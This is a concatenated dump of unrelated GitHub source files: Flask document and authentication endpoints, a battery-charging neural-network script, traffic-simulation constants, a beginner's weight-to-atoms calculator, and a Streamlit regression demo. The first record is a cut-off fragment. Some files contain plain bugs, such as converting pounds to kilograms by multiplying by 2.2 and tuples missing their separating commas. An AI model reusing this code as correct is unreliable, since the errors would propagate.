'12/15/2015 17:22:29',\n # 'entered_by': 'Sarah',\n # 'dataset_name': 'Annual Survey of Hours and Earnings Pensions categories (Annual Survey of Hours and Earnings (ASHE))',\n # 'data_owner': 'ONS',\n # 'category1': '1 - People',\n # 'category2': '1.1 - Demographics, social',\n # 'category_notes': 'Primarily concerns earnings and hours so broader than cost, price and rent',\n # 'source_of_information': '',\n # 'source_weblink': 'http://www.ons.gov.uk/ons/rel/ashe/annual-survey-of-hours-and-earnings-pension-tables/index.html',\n # 'dataset_content': '1% sample of employee jobs taken from HM Revenue & Customs (HMRC) Pay As You Earn (PAYE) records. ASHE does not cover the self-employed nor does it cover employees not paid during the reference period. In 2015 information related to the pay period. Sample size: 180,000 employee jobs',\n # 'geographic_coverage': '1 - UK',\n # 'geographic_units': 'National',\n # 'geography_notes': '',\n # 'time_period_from': '1998',\n # 'time_period_to': 'On-going',\n # 'time_frequency': 'Annual',\n # 'time_notes': 'The ASHE replaced the New Earnings Survey (NES) which was administered by the ONS since the 1970s.',\n # 'data_type': 'Sample survey',\n # 'data_type_notes': 'Estimates on the levels and distribution of earnings and hours for employees in the UK. Estimates are available for a variety of breakdowns by age groups, gender, industry, and pension type.',\n # 'data_quality': 'Primary weaknesses identified by ONS include: lack of personal demographic data, timing and periodicity, no coverage of self employed and quality of estimates and low levels of disaggregation can be poor.',\n # 'data_access': 'Free to download from the ONS',\n # 'data_owner_attitude_to_research_use': '',\n # 'other_notes': ''\n # }\n # response = ad.add_dataset({}, tags)\n # dataset_name = ''\n # try:\n # print('Added', response['result']['name'])\n # pprint.pformat(response)\n # dataset_name = response['result']['name']\n #\n # except:\n # dataset_name = re.sub(\n # r'[^\\x61-\\x7A]|\\x40|\\x55|\\x137', r'',\n # tags['dataset_name'].lower().replace(' ', '-')\n # )\n\n\n","repo_name":"whelks-chance/cache","sub_path":"housing_portal/ckan_tools/add_dataset.py","file_name":"add_dataset.py","file_ext":"py","file_size_in_byte":9046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4107198190","text":"from flask import request, jsonify, Blueprint\nfrom flask_cors import cross_origin\nfrom auth import check_token\nfrom documents import Documents\nfrom RestSurvey import get_survey\nimport psycopg2\nimport jwt\n\ndocs = Blueprint('documents', __name__)\ndocuments = Documents()\n\n\n@docs.route('/documents/get_document', methods=['POST'])\n@cross_origin(supports_credentials=True)\ndef get_document():\n try:\n request_data = request.get_json()\n docID = request_data['documentId']\n print('(get_document) extracted id=', docID, ', sending sql query to database')\n result = documents.getDocument(docID)\n print('founded: ', result)\n return (jsonify(\n {\"category\": result[0], \"title\": result[1], \"info\": result[2], \"links\": result[-3], \"short\": result[-4],\n \"image\": result[-1]}), 200) if result else (jsonify(\"false\"), 401)\n\n except psycopg2.Error as e:\n error_message = str(e)\n print(\"SQL error:\", error_message)\n documents.DBConnection.commit()\n return jsonify('false'), 500\n except Exception as e:\n error_message = str(e)\n print(\"Unknown error:\", error_message)\n return jsonify('false'), 500\n\n\n@docs.route('/documents/get_categories')\n@cross_origin(supports_credentials=True)\ndef get_categories():\n try:\n results = documents.getCategories()\n if len(results) == 0:\n return jsonify(\"false\"), 401\n\n acc = []\n for result in results:\n acc.append({\"category\": result[0]})\n return jsonify({\"results\": acc}), 200\n\n except psycopg2.Error as e:\n error_message = str(e)\n print(\"SQL error:\", error_message)\n documents.DBConnection.commit()\n return jsonify('false'), 500\n except Exception as e:\n error_message = str(e)\n print(\"Unknown error:\", error_message)\n return jsonify('false'), 500\n\n\n@docs.route('/documents/get_by_category', methods=['POST'])\n@cross_origin(supports_credentials=True)\ndef get_by_category():\n try:\n request_data = request.get_json()\n category = request_data['category']\n print('Searching for all articles with category: ', category)\n results = documents.getAllByCategory(category)\n print('Articles found: ', len(results))\n if len(results) == 0:\n return jsonify([]), 200\n\n acc = []\n for result in results:\n acc.append(\n {\"id\": result[-2], \"category\": result[0], \"title\": result[1], \"short\": result[-4], \"image\": result[-1]})\n\n return jsonify({\"results\": acc}), 200\n\n except psycopg2.Error as e:\n error_message = str(e)\n print(\"SQL error:\", error_message)\n documents.DBConnection.commit()\n return jsonify('false'), 500\n except Exception as e:\n error_message = str(e)\n print(\"Unknown error:\", error_message)\n return jsonify('false'), 500\n\n\n@docs.route('/documents/get_by_name', methods=['POST'])\n@cross_origin(supports_credentials=True)\ndef get_by_name():\n try:\n request_data = request.get_json()\n name = request_data['name']\n print('Filtered keyword: ', name)\n results = documents.getAllByName(name)\n print('Found ', len(results), ' results')\n if len(results) == 0:\n return jsonify({\"results\": []}), 200\n\n acc = []\n for result in results:\n acc.append(\n {\"id\": result[-2], \"category\": result[0], \"title\": result[1], \"short\": result[-4], \"image\": result[-1]})\n return jsonify({\"results\": acc}), 200\n\n except psycopg2.Error as e:\n error_message = str(e)\n print(\"SQL error:\", error_message)\n documents.DBConnection.commit()\n return jsonify('false'), 500\n except Exception as e:\n error_message = str(e)\n print(\"Unknown error:\", error_message)\n return jsonify('false'), 500\n\n\n@docs.route('/documents/get_recommendations', methods=['POST'])\n@cross_origin(supports_credentials=True)\ndef get_recommendations():\n token = request.headers.get('token')\n print('(get_recommendations) received token: ', token)\n try:\n id = check_token(token)\n if not id:\n return jsonify('false'), 401\n\n print('extracting survey from database with userid: ', id)\n surv = get_survey(id)\n if not surv:\n return jsonify(\"false\"), 401\n\n print('survey found.')\n age = surv[1]\n kids = int(surv[2])\n baby = int(surv[3])\n teen = int(surv[4])\n adult = int(surv[5])\n accom = int(surv[6])\n insure = int(surv[7])\n study = int(surv[8])\n job = int(surv[9])\n live = int(surv[10])\n refugee = int(surv[11])\n other = int(surv[12])\n documentType = surv[13]\n results = documents.getRecommendations(id, age, kids, baby, teen, adult, accom, insure, study, job, live,\n refugee, other,\n documentType)\n if len(results) == 0:\n return jsonify([]), 404\n\n acc = []\n for result in results:\n acc.append(\n {\"title\": result[0], \"short\": result[1], \"id\": result[3], \"category\": result[4], \"image\": result[-1]})\n return jsonify({\"results\": acc}), 200\n\n except jwt.ExpiredSignatureError:\n return jsonify('false'), 401\n except jwt.InvalidTokenError:\n return jsonify('false'), 401\n except psycopg2.Error as e:\n error_message = str(e)\n print(\"SQL error:\", error_message)\n documents.DBConnection.commit()\n return jsonify('false'), 500\n except Exception as e:\n error_message = str(e)\n print(\"Unknown error:\", error_message)\n return jsonify('false'), 500\n","repo_name":"actionboyvn/ZPI_VAF","sub_path":"iaff_back/RestDocuments.py","file_name":"RestDocuments.py","file_ext":"py","file_size_in_byte":5829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12655109007","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 19 11:51:25 2017\r\n\r\n@author: Alice\r\n\"\"\"\r\n\r\nCOEF_DIST_VEHICULE = {'Camion': 1.2, 'Voiture': 1, 'Moto': 0.9,'Poney': 0.4}\r\n\r\nCOEF_DIST_CONDUCTEUR = {'Prudent': 1.33, 'Normal': 1, 'Chauffard': 0.4}\r\n\r\nCOEF_VITESSE_CONDUCTEUR = {'Prudent': 0.8, 'Normal': 1, 'Chauffard': 1.1}\r\n\r\n\r\nPART_VEHICULE = ((('Camion', 0.16), ('Voiture', 0.68), ('Moto', 0.05), ('Poney', 0.01))\r\n (('Camion', 0.2), ('Voiture', 0.7),('Moto', 0.09), ('Poney', 0.01)))\r\n\r\nPART_CONDUCT = ((('Prudent', 0.08), ('Normal', 0.87), ('Chauffard', 0.05))\r\n (('Prudent', 0.1), ('Normal', 0.8), ('Chauffard', 0.1)))\r\n","repo_name":"mgaudin/urban-potato","sub_path":"Script/parametre.py","file_name":"parametre.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73609895527","text":"#!/usr/bin/python2\n\n#develop neural network for routine/conservative users reading from csv\n#values in csv has been extrapolated to reach level 15 to start charging\n#values have been rounded to exclude too much fluctuations\n#T round by 30 mins, Level binned by 5, FG by 0.1 and dLevel by 5 levels drop\n\n\nimport os\nimport numpy as np\nfrom collections import defaultdict, Counter, OrderedDict\nimport pickle\nfrom datetime import *\nimport csv\nfrom pylab import *\nimport statsmodels as stats\nimport pandas as pd\nimport pandas.tools.plotting as pdtools\nfrom sklearn.neural_network import MLPClassifier\n\n\n#first load csv data into dataframe\n#second filter out all data points for time_left_to_charge <=180 mins\n#aim being we start with making the model accurate for instances close\n#to charging session\n\ndef readCSV(csvF):\n\tdatapoints = []\n\twith open(csvF) as csvfile:\n\t\treader = csv.reader(csvfile, delimiter=';')\n\t\theading = next(reader)\n\t\tfor row in reader:\n\t\t\ttime_since_start_discharge = int(row[0])\n\t\t\tlevel_now = int(row[1])\n\t\t\tlevel_drop_since_start = int(row[2])\n\t\t\tforeground_usage_frac = float(row[3])\n\t\t\ttime_left_to_charge = int(row[4])\n\t\t\tif time_left_to_charge <= 600:\n\t\t\t\tdatapoints.append([time_since_start_discharge,level_now,level_drop_since_start,foreground_usage_frac,time_left_to_charge])\n\n\t#now filter datapoints with time_left_to_charge <=180 mins\n\t#X are independent variables and Y is time_left_to_charge,\n\t#round each time_left_to_charge to multiples of 30\n\tprint('*************', len(datapoints))\n\tX = []\n\tY = []\n\tfor i in range(len(datapoints)):\n\t\tX.append([datapoints[i][0], datapoints[i][1], datapoints[i][2], datapoints[i][3]])\n\t\trem = datapoints[i][4]%60\n\t\tif (rem == 0 and datapoints[i][4] != 0) or rem==30:\n\t\t\tnew_tl = datapoints[i][4]\n\t\telif rem < 30:\n\t\t\tnew_tl = int(datapoints[i][4]/60)*60+30\n\t\telse:\n\t\t\tnew_tl = int(datapoints[i][4]/60)*60+60\n\t\t#print('rounded', datapoints[i][4], new_tl)\n\t\tY.append(new_tl)\n\tdict_ = {'X':X, 'Y':Y}\n\treturn dict_\n\ndef neural_network(X, Y):\n\t#now possible outputs are 30, 60, 90, 120, 150, 180, 210, 240, 270, 300, 330, 360, 390, 420, 450, 480, 510, 540, 570, 600: 20 classes\n\t#we will get 300 training datapoints for each of the classes\n\t#and keep 300 for testing set for motherload X and Y\n\ttrainX = []\n\ttrainY = []\n\ttestX = []\n\ttestY = []\n\tlabel1 = label2 = label3 = label4 = label5 = label6 =label7 =label8= 0\n\tlabel9 = label10 = label11 = label12 = label13 = label14 = label15 = 0\n\tlabel16 = label17 = label18 = label19 = label20 = 0\n\tfor i in range(len(Y)):\n\t\tif len(testY) == 20*100 and len(trainY) == 20*400:\n\t\t\tprint('looped till: ', i)\n\t\t\tbreak\n\t\tif Y[i] == 30:\n\t\t\tif label1 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label1<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel1 += 1\n\t\telif Y[i] == 60:\n\t\t\tif label2 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label2<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel2 += 1\n\t\telif Y[i] == 90:\n\t\t\tif label3 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label3<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel3 += 1\n\t\telif Y[i] == 120:\n\t\t\tif label4 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label4<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel4 += 1\n\t\telif Y[i] == 150:\n\t\t\tif label5 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label5<500:\n\t\t\t\ttestY.append(Y[i])\n\t\t\t\ttestX.append(X[i])\n\t\t\tlabel5 += 1\n\t\telif Y[i] == 180:\n\t\t\tif label6 < 300:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label6<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel6 += 1\n\t\telif Y[i] == 210:\n\t\t\tif label7 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label7<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel7 += 1\n\t\telif Y[i] == 240:\n\t\t\tif label8 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label8<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel8 += 1\n\t\telif Y[i] == 270:\n\t\t\tif label9 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label9<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel9 += 1\n\t\telif Y[i] == 300:\n\t\t\tif label10 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label10<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel10 += 1\n\t\telif Y[i] == 330:\n\t\t\tif label11 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label11<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel11 += 1\n\t\telif Y[i] == 360:\n\t\t\tif label12 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label12<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel12 += 1\n\t\telif Y[i] == 390:\n\t\t\tif label13 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label13<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel13 += 1\n\t\telif Y[i] == 420:\n\t\t\tif label14 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label14<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel14 += 1\n\t\telif Y[i] == 450:\n\t\t\tif label15 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label15<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel15 += 1\n\t\telif Y[i] == 480:\n\t\t\tif label16 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label16<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel16 += 1\n\t\telif Y[i] == 510:\n\t\t\tif label17 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label17<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel17 += 1\n\t\telif Y[i] == 540:\n\t\t\tif label18 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label18<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel18 += 1\n\t\telif Y[i] == 570:\n\t\t\tif label19 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label19<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel19 += 1\n\t\telif Y[i] == 600:\n\t\t\tif label20 < 400:\n\t\t\t\ttrainX.append(X[i])\n\t\t\t\ttrainY.append(Y[i])\n\t\t\telif 400<=label20<500:\n\t\t\t\ttestX.append(X[i])\n\t\t\t\ttestY.append(Y[i])\n\t\t\tlabel20 += 1\n\n\t#now the MLPClassifier model\n\titer_ = 500\n\tm = 15\n\tn = 20\n\tprint('parameters', iter_, m, n)\n\tclf = MLPClassifier(hidden_layer_sizes=(m,n), random_state=1, max_iter=1, warm_start=True)\n\tfor i in range(iter_):\n\t\tclf.fit(trainX, trainY)\n\t\t#print([coef.shape for coef in clf.coefs_])\n\tpred_ = clf.predict(testX)\n\tprint(len(pred_), len(testY), len(trainY), label7, label8)\n\tscore0 = score1 = score2 = score3 = 0\n\tright = []\n\tfor i in range(len(pred_)):\n\t\tif pred_[i] == testY[i]:\n\t\t\tscore0 += 1\n\t\t\t#print(pred_[i], testY[i])\n\t\telif abs(pred_[i] - testY[i]) <=30:\n\t\t\tscore1 += 1\n\t\t\t#print(pred_[i], testY[i])\n\t\telif abs(pred_[i] - testY[i]) <= 60:\n\t\t\tscore2 += 1\n\t\telse:\n\t\t\tscore3 += 1\n\t\t#print('predicted: ', pred_[i], ' real: ', testY[i])\n\tprint(score0, score1, score2, score3, len(pred_))\n\tprint('accuracy', (score0+score1)/len(pred_))\n\ta = 0\n\tb = []\n\tc = 0\n\ttl = 360\n\tfor i in range(len(testY)):\n\t\tif testY[i] == tl:\n\t\t\tif abs(pred_[i] -testY[i]) <=30:\n\t\t\t\ta += 1\n\t\t\telse:\n\t\t\t\tb.append(abs(pred_[i]-testY[i]))\n\t\t\tc += 1\n\tprint('for time left', tl, ':correct=',a,' total=', c)\n\tprint(len(b),np.mean(b),'****************', b)\n\t#plotting\n\tfig = figure(0, dpi=100)\n\terr = []\n\tfor i in range(len(pred_)):\n\t\terr.append(abs(pred_[i] - testY[i]))\n\t#plot(testY,err, 'ro')\n\t#title('Neural Network prediction with 1800 samples for <=180 mins')\n\t#plt.show()\n\nif __name__ == '__main__':\n\t#first check reading csv and creating input/output\n\tdict_ = readCSV('/home/anudipa/pattern/git_scripts/usage-pattern/data/csv/0f73f649f1e0bb371f1fdcadf86f02567670315a.csv')\n\tprint('X', len(dict_['X']))\n\tprint('Y', dict_['Y'][:25])\n\tneural_network(dict_['X'], dict_['Y'])\n","repo_name":"anudipa/usage-pattern","sub_path":"latest/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":7773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2091263808","text":"\"\"\"Routes for user authentication.\"\"\"\r\nfrom flask import Blueprint, jsonify, request\r\nfrom flask_login import login_user\r\nfrom models import User, ACCESS\r\nfrom __init__ import login_manager, db\r\nfrom functools import wraps\r\n\r\n# Blueprint Configuration\r\nauth_bp = Blueprint(\r\n 'auth_bp', __name__\r\n)\r\n\r\n\r\n### custom wrap to determine access level ###\r\ndef requires_access_level(access_level):\r\n def decorator(f):\r\n @wraps(f)\r\n def decorated_function(*args, **kwargs):\r\n response = {}\r\n email = request.headers.get('email')\r\n user = User.query.filter_by(email=email).first()\r\n if not user:\r\n response['error'] = f\"Unable to find user with email {email}\"\r\n return jsonify(response)\r\n elif not user.check_password(request.headers.get('password')): # the user is not logged in\r\n response['error'] = f\"Unable to Validate Password\"\r\n return jsonify(response)\r\n if \"|\" in access_level:\r\n if not (user.allowed(access_level.split(\"|\")[0]) and user.allowed(access_level.split(\"|\")[1])):\r\n response['error'] = 'You do not have access to this resource.'\r\n return jsonify(response)\r\n elif not user.allowed(access_level):\r\n response['error'] = 'You do not have access to this resource.'\r\n return jsonify(response)\r\n return f(*args, **kwargs)\r\n\r\n return decorated_function\r\n\r\n return decorator\r\n\r\n\r\n@auth_bp.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n response = {}\r\n data = request.get_json()\r\n email = data['email']\r\n user = User.query.filter_by(email=email).first()\r\n if user and user.is_authenticated:\r\n response['text'] = f\"user {user.username} already logged in \"\r\n return jsonify(response)\r\n elif user and user.check_password(password=data['password']):\r\n login_user(user)\r\n response['text'] = f\"logged in {user.username}\"\r\n return jsonify(response)\r\n else:\r\n response['error'] = \"Unable to find user\"\r\n return jsonify(response)\r\n\r\n\r\n@auth_bp.route('/signup', methods=['GET', 'POST'])\r\ndef signup():\r\n \"\"\"\r\n User sign-up page.\r\n\r\n GET requests serve sign-up page.\r\n POST requests validate form & user creation.\r\n \"\"\"\r\n response = {}\r\n data = request.get_json()\r\n email = data['email']\r\n existing_user = User.query.filter_by(email=email).first()\r\n user = User()\r\n if not existing_user:\r\n user.email = data['email']\r\n user.username = data['name']\r\n user.set_password(data[\"password\"])\r\n db.session.add(user)\r\n db.session.commit() # Create new user\r\n login_user(user) # Log in as newly created user\r\n response['text'] = f\"User Signed up {user.email}\"\r\n return jsonify(response)\r\n else:\r\n response['text'] = f\"User {existing_user.email} already exists\"\r\n return jsonify(response)\r\n\r\n\r\n@login_manager.unauthorized_handler\r\ndef unauthorized():\r\n response = {}\r\n \"\"\"Redirect unauthorized users to Login page.\"\"\"\r\n response['error'] = 'You must be logged in to view that page.'\r\n return jsonify(response)\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n return User.get(user_id)\r\n\r\n\r\n@auth_bp.route('/delete_user')\r\n@requires_access_level(ACCESS['admin'])\r\ndef delete_user():\r\n response = {}\r\n data = request.json()\r\n email = data['email']\r\n existing_user = User.query.filter_by(email=email).first()\r\n db.session.delete(existing_user)\r\n db.session.commit()\r\n response['message'] = f'User with email {email} has been deleted.'\r\n return jsonify(response)\r\n\r\n\r\n# control panel\r\n@auth_bp.route('/control_panel')\r\n@requires_access_level('admin')\r\ndef control_panel():\r\n all_users = User.query.all()\r\n serialized_users = []\r\n for usr in all_users:\r\n serialized_users.append(usr.serialize())\r\n return jsonify(serialized_users)\r\n","repo_name":"sskhan67/THE","sub_path":"auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31443153142","text":"\"\"\"Your Place in the Universe Program: Modified for Units of \nKilograms. Modify the Your Place in the Universe program for international\n users, so that the user enters their weight in kilograms, and not\n in pounds. \n\"\"\"\n#initialization\nnum_atoms_universe = 10e80\nweigh_avg_person = 70 #70 kg (154 lbs)\nnum_atoms_avg_person = 7e27\n\n#program greeting\nprint(\"\\nHello, this program will determine your place in the universe.\")\n\n#prompt for user's weight\nweight_lbs = int(input(\"\\nEnter your weight in pounds: \"))\n\n#convert lbs to kg\nweight_kg = weight_lbs * 2.2\n\n#determine number atoms in person\nnum_atoms_person = (weight_kg / 70) * num_atoms_avg_person\npercent_of_universe = (num_atoms_person / num_atoms_universe) * 100\n\n#display results\nprint(\"\\nYou contain approximately\", format(num_atoms_person, '.2e'), 'atoms\\n')\nprint(\"Therefore, you comprise\", format(percent_of_universe, '.2e'), '% of the universe\\n')\n","repo_name":"claudmiine/Python-Excercises","sub_path":"Your Place in the Universe.py","file_name":"Your Place in the Universe.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13137095203","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 21 11:43:29 2022\n\n@author: humeyraakyuz\n\"\"\"\n\nimport numpy as np\nimport streamlit as st\nimport plotly.express as px\nimport pandas as pd\nfrom sklearn.datasets import fetch_california_housing\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import r2_score\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport scipy.signal.signaltools\nfrom sklearn import preprocessing\n\ndef root_mean_squared_error(actual, predictions):\n return np.sqrt(mean_squared_error(actual, predictions))\n\n\ndef _centered(arr, newsize):\n # Return the center newsize portion of the array.\n newsize = np.asarray(newsize)\n currsize = np.array(arr.shape)\n startind = (currsize - newsize) // 2\n endind = startind + newsize\n myslice = [slice(startind[k], endind[k]) for k in range(len(endind))]\n return arr[tuple(myslice)]\n\nscipy.signal.signaltools._centered = _centered\n\n\n\ndef reg(x, y, group, p=0.3, verbose=False):\n beta = np.random.random(2)\n gamma = dict((k, np.random.random(2)) for k in range(6))\n\n if verbose:\n st.write(beta)\n st.write(gamma)\n st.write(x)\n\n alpha = 0.002\n my_bar = st.progress(0.)\n n_max_iter = 100\n for it in range(n_max_iter):\n\n err = 0\n for _k, _x, _y in zip(group, x, y):\n y_pred = p * (beta[0] + beta[1] * _x) + (1 - p) * (gamma[_k][0] + gamma[_k][1] * _x)\n\n g_b0 = -2 * p * (_y - y_pred)\n g_b1 = -2 * p * ((_y - y_pred) * _x)\n\n # st.write(f\"Gradient of beta0: {g_b0}\")\n\n g_g0 = -2 * (1 - p) * (_y - y_pred)\n g_g1 = -2 * (1 - p) * ((_y - y_pred) * _x)\n\n beta[0] = beta[0] - alpha * g_b0\n beta[1] = beta[1] - alpha * g_b1\n\n gamma[_k][0] = gamma[_k][0] - alpha * g_g0\n gamma[_k][1] = gamma[_k][1] - alpha * g_g1\n\n err += (_y - y_pred) ** 2\n\n print(f\"{it} - Beta: {beta}, Gamma: {gamma}, Error: {err}\")\n my_bar.progress(it / n_max_iter)\n\n return beta, gamma\n\n\n\n\n\ndef modifiedModel(x, y,teta) -> np.ndarray:\n \n lam=0.01\n alpha=0.001\n iteration=200\n \n \n objective_values=[]\n beta = np.random.random(2)\n \n for i in range(iteration):\n \n y_pred: np.ndarray = beta[0] + beta[1] * x\n \n g_b0 = 0\n g_b1 = 0\n objective = 0\n for i,v in enumerate(x):\n objective += (max(teta,np.abs(y[i] - y_pred[i])))**2 \n if np.abs(y[i] - y_pred[i]) >= teta:\n err = y[i] - y_pred[i]\n g_b0 = g_b0 -2 * err\n g_b1 = g_b1 -2 * err * v\n \n g_b0 = (g_b0 / len(x)) + 2 * lam * beta[0]\n g_b1 = (g_b1 / len(x)) + 2 * lam * beta[1]\n \n objective = (objective / len(x) + ((beta[0]+ beta[1])**2))\n \n print(f\"({i}) beta: {beta}, gradient: {g_b0} {g_b1} obj: {objective}\")\n beta_prev = np.copy(beta)\n objective_values.append(objective)\n\n \n beta[0] = beta[0] - alpha * g_b0 \n beta[1] = beta[1] - alpha * g_b1 \n\n if np.linalg.norm(beta - beta_prev) < 0.000001:\n print(f\"I do early stoping at iteration {i}\")\n break\n \n # plot objective function during iterations\n plt.figure(figsize = (10, 6))\n plt.plot(range(1, iteration + 1), objective_values, \"k-\")\n plt.xlabel(\"Iteration\")\n plt.ylabel(\"Error\")\n plt.show()\n \n return beta\n\n\n\n\ndef normalize(df):\n for cl in df:\n df[cl]= (df[cl]- df[cl].mean())/df[cl].std()\n return df\n\n\ndef performance(beta,X,y):\n y_pred=[]\n for v in X:\n y_pred.append( beta[0] + beta[1] * v)\n\n dg1 = pd.DataFrame(dict(x=X, y=y, y_pred=y_pred))\n\n\n fig1 = plt.figure(figsize = (10, 10))\n plt.plot(X, dg1[\"y\"], \"b.\", markersize = 5)\n plt.plot(X, dg1[\"y_pred\"], \"c.\", markersize = 5)\n st.plotly_chart( fig1, use_container_width=True)\n\n\n st.write(f\"Mean Squared Error: {mean_squared_error(y,y_pred)}\")\n st.write(f\"Root Mean Squared Error: {root_mean_squared_error(y,y_pred)}\")\n st.write(f\"R^2 score: {r2_score(y,y_pred)}\")\n\n\n\n\nst.header(\"Building a Simple Regression Model with Different Loss Function\")\nst.markdown(\"\"\"\n In that problem I assume that for each data point if the prediction error below the specified threshold, that error is acceptable and does not effect the gradient:\n \n For example for a house with price 5, if prediction is between 4 and 6, that prediction is okay,otherwise we should penalize deviation.\n In order to achieve this our objective function(loss function) has changed\n \n p.s: if you think my assumption is wrong, just change the >= to <= in code (line 101)\n \n New loss function is: \n \"\"\")\n\nst.subheader(\"Formulating the Model\")\nst.markdown(\"#### General Model\")\nst.latex(r\"\\hat{y}^{0}_i=\\beta_0 + \\beta_1 x_i\")\n\nst.markdown(\"#### Loss Function\")\n\n\nst.latex(\n r\"L(\\beta_0,\\beta_1)=\\sum_{i=1}^{N}{(max(\\Theta,(y_i - \\hat{y}_i ))^2)/N + \\lambda (\\beta_0^2 + \\beta_1^2)}\")\n\n\nst.markdown(\"#### Partial Derivatives\")\n\nst.markdown(\"\"\"\n We should use chain rule and backpropagation to explain the max function effect.\n \n For example derivative of that function with respect to lambda is:\n \"\"\")\nst.latex(\n r\" y(\\lambda) = max(\\Theta,\\lambda)\")\n \nst.latex(\n r\"\\frac{\\partial y(\\lambda)}{\\partial \\lambda} = \\begin{cases} 1 &\\text{if } \\lambda > \\Theta \\\\ 0 &\\text{otherwise } \\end{cases}\")\n \n\nst.markdown(\"\"\"Therefore if error is smaller than a specified threshold , it will not effect the gradient. \n For that case, we can calculate gradient like that:\n \"\"\")\n\nst.latex( r\"\\qquad \\qquad \\Delta B_0 = 0 , \\Delta B_1 = 0\")\nst.latex( r\"\\text{for i in X:} \")\nst.latex( r\"\\qquad \\qquad \\qquad \\qquad \\qquad \\text{if } y_i - \\hat{y}_i > \\Theta :\")\nst.latex( r\"\\qquad \\qquad \\qquad \\qquad \\qquad \\qquad \\qquad \\qquad \\Delta B_0 + = -2 * (y_i - \\hat{y}_i) 